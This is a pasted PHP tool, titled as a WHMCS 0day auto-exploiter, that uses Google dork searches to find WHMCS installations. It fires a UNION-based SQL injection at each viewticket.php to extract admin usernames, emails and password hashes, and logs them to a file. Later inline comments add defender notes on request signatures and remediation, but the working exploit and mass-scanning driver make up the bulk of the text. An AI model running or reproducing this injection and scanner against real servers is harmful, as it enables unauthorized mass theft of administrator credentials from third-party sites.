oposuu

(PHP) WHMCS Exploiter 0day

Nov 16th, 2013
  1. <?php
  2. /*
  3. *****************************************************
  4. WHMCS 0day Auto Exploiter <= 5.2.8
  5. Coded by g00n - Skype: t3hg00n
  6. wwww.xploiter.net
  7. *****************************************************
  8. Preview:
  9. http://i.imgur.com/qB726Gm.png
  10. In action:
  11. http://i.imgur.com/oNpZAf6.png
  12. http://i.imgur.com/gFlBjtD.png
  13. *****************************************************
  14. */
  15.  
  16. set_time_limit(0); // removes PHP's execution time limit, so one request can run for the whole scan
  17. ini_set('memory_limit', '64M'); // sets this script's memory limit to 64M
  18. header('Content-Type: text/html; charset=UTF-8'); // the response is declared as UTF-8 HTML
  19. function letItBy(){ ob_flush(); flush(); } // flushes PHP's output buffer, then the system write buffer, so progress lines are sent while the scan is still running
  20. function getAlexa($url)
  21. {
      // Requests http://data.alexa.com/data for $url and returns the TEXT attribute of the
      // POPULARITY element under the second SD node, or 0 when that node is missing.
      // $url is concatenated into the query string without urlencode(), and a failed
      // simplexml_load_file() (which returns false) is not checked before ->SD is read.
      // Network artifact: one outbound request to data.alexa.com per candidate URL.
  22. $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  23. $rank1 = $xml->SD[1];
  24. if($rank1)
  25. $rank = $rank1->POPULARITY->attributes()->TEXT;
  26. else
  27. $rank = 0;
  28. return $rank;
  29. }
  30.  
  31. function google_that($query, $page=1)
  32. {
      // Fetches one page of web-search results for $query from the ajax.googleapis.com
      // search endpoint and returns the decoded 'results' array.
      // Returns false when responseStatus is not '200' or the result list is empty;
      // calls die() when the decoded reply has no responseStatus key at all.
      // Eight results are requested per page and the offset is $page * 8.
  33. $resultPerPage=8;
  34. $start = $page*$resultPerPage;
  35. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
      // The second argument (true) makes http_get() sleep one second before the request.
  36. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  37. if(isset($resultFromGoogle['responseStatus'])) {
  38. if($resultFromGoogle['responseStatus'] != '200') return false;
  39. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  40. else return $resultFromGoogle['responseData']['results'];
  41. }
  42. else
  43. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  44. }
  45.  
  46. function http_get($url, $safemode = false){
      // Performs a GET on $url with cURL and returns the response body (curl_exec()
      // returns false on failure). When $safemode is strictly true the call first
      // sleeps for one second. Redirects are followed and the connect timeout is 10 s.
  47. if($safemode === true) sleep(1);
  48. $im = curl_init($url);
  49. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  50. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  51. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  52. curl_setopt($im, CURLOPT_HEADER, 0);
  53. return curl_exec($im);
      // NOTE(review): the next line follows the return and is never reached; it also
      // passes no handle, so the cURL handle is never closed explicitly.
  54. curl_close();
  55. }
  56.  
  57. function check_vuln($url) {
      // Sends one crafted POST to the viewticket.php next to $url and returns the
      // delimiter-wrapped matches found in the response, or the string "Fail!".
      //
      // What a defender sees on the receiving web server:
      //   - the request path ends in /viewticket.php (any "/admin" in the URL is removed first)
      //   - the POST body passes `tid` as an array with `sqltype` and `value` keys rather than
      //     a scalar; presumably an ordinary ticket view never sends tid[sqltype], which would
      //     make that parameter name a usable log/WAF signature (confirm against normal traffic)
      //   - the value is a UNION SELECT that reads id, username, email and password from
      //     tbladmins, wrapped in 0x3a3a3a3a3a (":::::") markers so the reply can be parsed
      //   - a fixed User-Agent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
      //
      // The file header names WHMCS <= 5.2.8 as affected. A logged request of this shape against
      // such an install should be handled as possible disclosure of admin password hashes:
      // move to a later release and rotate the admin credentials.
  58. $url = dirname($url) . '/viewticket.php';
  59. $url = str_replace("/admin","",$url);
  60.  
  61. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  62. $curl_connection = curl_init($url);
  63. if($curl_connection != false) {
  64. curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  65. curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  66. curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
      // TLS certificate verification is switched off for this request.
  67. curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  68. curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  69. curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  70. $source = curl_exec($curl_connection);
      // Collects every non-greedy span between two ":::::" markers; the /s flag lets a span
      // cross line breaks. $infoz[0] holds the full matches, markers included.
  71. preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  72. if($infoz[0]) {
  73. return $infoz[0];
  74. }
  75. else
  76. return "Fail!";
  77. }
  78. else
  79. return "Fail!";
  80. }
  81. ?>
  82. <html>
  83. <head>
  84. <title>WHMCS Auto Xploiter - by g00n</title>
  85. </head>
  86. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  87.  
  88. <STYLE>
  89. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  90. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  91. body {
  92. font-family: Tahoma
  93. }
  94. tr {
  95. BORDER: dashed 1px #333;
  96. color: #FFF;
  97. }
  98. td {
  99. BORDER: dashed 1px #333;
  100. color: #FFF;
  101. }
  102. .table1 {
  103. BORDER: 0px Black;
  104. BACKGROUND-COLOR: Black;
  105. color: #FFF;
  106. }
  107. .td1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. font: 7pt Verdana;
  111. color: Green;
  112. }
  113. .tr1 {
  114. BORDER: 0px;
  115. BORDER-COLOR: #333333;
  116. color: #FFF;
  117. }
  118. table {
  119. BORDER: dashed 1px #333;
  120. BORDER-COLOR: #333333;
  121. BACKGROUND-COLOR: Black;
  122. color: #FFF;
  123. }
  124. input {
  125. border : dashed 1px;
  126. border-color : #333;
  127. BACKGROUND-COLOR: Black;
  128. font: 8pt Verdana;
  129. color: Red;
  130. }
  131. select {
  132. BORDER-RIGHT: Black 1px solid;
  133. BORDER-TOP: #DF0000 1px solid;
  134. BORDER-LEFT: #DF0000 1px solid;
  135. BORDER-BOTTOM: Black 1px solid;
  136. BORDER-color: #FFF;
  137. BACKGROUND-COLOR: Black;
  138. font: 8pt Verdana;
  139. color: Red;
  140. }
  141. submit {
  142. BORDER: buttonhighlight 2px outset;
  143. BACKGROUND-COLOR: Black;
  144. width: 30%;
  145. color: #FFF;
  146. }
  147. textarea {
  148. border : dashed 1px #333;
  149. BACKGROUND-COLOR: Black;
  150. font: Fixedsys bold;
  151. color: #999;
  152. }
  153. BODY {
  154. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  155. margin: 1px;
  156. color: Red;
  157. background-color: Black;
  158. }
  159. .main {
  160. margin : -287px 0px 0px -490px;
  161. BORDER: dashed 1px #333;
  162. BORDER-COLOR: #333333;
  163. }
  164. .tt {
  165. background-color: Black;
  166. }
  167.  
  168. A:link {
  169. COLOR: White; TEXT-DECORATION: none
  170. }
  171. A:visited {
  172. COLOR: White; TEXT-DECORATION: none
  173. }
  174. A:hover {
  175. color: Red; TEXT-DECORATION: none
  176. }
  177. A:active {
  178. color: Red; TEXT-DECORATION: none
  179. }
  180.  
  181. #result{margin:10px;}
  182. #result span{display:block;}
  183. #result .Y{background-color:green;}
  184. #result .X{background-color:red;}
  185. </STYLE>
  186. <script language=\'javascript\'>
  187. function hide_div(id)
  188. {
  189. document.getElementById(id).style.display = \'none\';
  190. document.cookie=id+\'=0;\';
  191. }
  192. function show_div(id)
  193. {
  194. document.getElementById(id).style.display = \'block\';
  195. document.cookie=id+\'=1;\';
  196. }
  197. function change_divst(id)
  198. {
  199. if (document.getElementById(id).style.display == \'none\')
  200. show_div(id);
  201. else
  202. hide_div(id);
  203. }
  204. </script>
  205. </td></table></tr>
  206. <br>
  207. <br>
  208. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  209. <style>
  210. body {
  211. font-family: 'Audiowide', serif;
  212. font-size: 30px;
  213.  
  214. }
  215. </style>
  216. </head>
  217.  
  218. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  219. <center>
  220. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  221. <br>
  222. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  223. </font>
  224. <br><br>
  225.  
  226. <table border=1 bordercolor=red>
  227. <tr>
  228. <td width="700">
  229. <br />
  230. <center>
  231. <form method="post">
  232. Google Dork: &nbsp;&nbsp;
  233. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  234. &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  235. </form>
  236. <?php
       // Driver: runs only when the form posted a non-empty `dork` value.
       // For up to 50 result pages it takes every URL returned by google_that(), passes it to
       // check_vuln() and getAlexa(), and records each hit.
       // Host artifact: hits are appended to "WMCS-Hashes.txt" in the script's working
       // directory, each entry framed by a line of 56 "=" characters, followed by the URL,
       // " - Alexa: <rank>" and the extracted records. The presence of that file on a server
       // indicates this script was run from it.
  237. if(isset($_POST['dork']{0})) {
  238. $file = fopen("WMCS-Hashes.txt","a");
  239. echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
  240. letItBy();
  241. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  242. $googleResult = google_that($_POST['dork'], $googlePage);
  243. if(!$googleResult) {
  244. echo 'Finished scanning.';
       // The output file is closed only on this early-exit path; if all 50 pages return
       // results there is no explicit fclose().
  245. fclose($file);
  246. break;
  247. }
  248.  
  249. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  250. $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  251. $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
       // check_vuln() returns an array of matches on a hit and the string "Fail!" otherwise.
  252. if($result != "Fail!") {
  253. $hashes = "";
  254. foreach ($result as $record) {
       // Removes the ":::::" markers, leaving one block of returned data per line.
  255. $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  256. }
  257. $sep = "========================================================\n";
  258. $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  259. fwrite($file,$data);
  260. echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  261. echo '<span class="Y">';
       // $data comes from remote responses and is echoed without HTML escaping.
  262. echo "<pre>" . $data . "</pre></span><br />";
  263.  
  264. }
  265. else {
  266. echo '<span class="X">';
       // The result URL and title are likewise written into the page unescaped.
  267. echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  268. echo "</span>\n<br />";
  269. }
  270. letItBy();
  271. }
  272. }
  273. echo '</div>';
  274. }
  275. ?>
  276. </center>
  277. </td>
  278. </table>
  279. <br /><br />
  280. <font face="Audiowide" color="red" size="2">
  281. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
  282. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  283. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  284. </font>
  285.  
  286. </center>
  287. </body>
  288. </html>